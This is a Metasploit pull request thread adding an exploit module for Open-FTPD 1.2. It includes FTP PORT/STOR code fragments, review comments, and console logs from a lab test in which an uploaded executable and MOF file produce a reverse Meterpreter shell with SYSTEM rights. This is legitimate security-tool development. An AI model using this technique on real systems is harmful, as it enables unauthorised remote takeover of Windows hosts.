Add Open-FTPD 1.2 Writable Directory Traversal Execution #2211

Merged
merged 1 commit into from Aug 12, 2013

@bcoles bcoles commented Aug 12, 2013

Add Open-FTPD 1.2 Writable Directory Traversal Execution

Homepage: http://sourceforge.net/projects/open-ftpd/
Tested on 1.2 (Windows XP SP3) (EN)

Open-FTPD 1.2 Writable Directory Traversal Execution

@jvazquez-r7 jvazquez-r7 commented Aug 12, 2013

Processing...

send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

# Tell the FTP server to download our file
send_cmd(['STOR', filename], false, conn)
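
Review bot: the comment above the STOR call says the server will "download" the file, which reads backwards for STOR: from the client's side this is an upload, and in active mode the server connects back to the address given in the PORT line to receive the data. Suggest wording it as "Tell the FTP server to store our file". Also note that the STOR call passes false where the PORT call passes true; in the Ftp mixin that argument is the recv flag, so the server's reply to STOR is not read at this point. Make sure the reply is read and checked once the data transfer finishes, so a rejected STOR is reported as a failure rather than passing silently.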

@jvazquez-r7 jvazquez-r7 Aug 12, 2013

According to the code, it looks more like an arbitrary file upload than a directory traversal vulnerability, as written in the Name and Description of the module. Is that right, or am I forgetting something?

Thanks!

@bcoles bcoles Aug 12, 2013

You're correct. 'Arbitrary file upload' is more applicable.

@jvazquez-r7 jvazquez-r7 Aug 12, 2013

Awesome. In this case I'm fixing things myself and landing, since they are just minor changes. Thanks @bcoles!

@jvazquez-r7 jvazquez-r7 commented Aug 12, 2013

Once comments are clarified by @bcoles it's ready to be landed:

msf exploit(open_ftpd_wbem) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload bexsGiK.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50356 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload BRhkiOcs.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50358 - Sending MOF (2190 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:2481) at 2013-08-12 09:10:39 -0500
[+] Deleted wbem\mof\good\BRhkiOcs.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: bexsGiK.exe

meterpreter > exit
[*] Shutting down Meterpreter...

jvazquez-r7 pushed a commit that referenced this issue Aug 12, 2013
@jvazquez-r7 jvazquez-r7 merged commit d63d7bc into rapid7:master Aug 12, 2013
1 check passed
@jvazquez-r7 jvazquez-r7 commented Aug 12, 2013

Last changes here: 8ac01d3

Final test:

msf exploit(open_ftpd_wbem) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload luguTktG.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:52338 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload rgzFGsEGKn.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.0.3:52340 - Sending MOF (2199 bytes)
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:1039) at 2013-08-12 11:18:55 -0500
[+] Deleted wbem\mof\good\rgzFGsEGKn.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: luguTktG.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit
[*] Shutting down Meterpreter...

Thanks @bcoles !
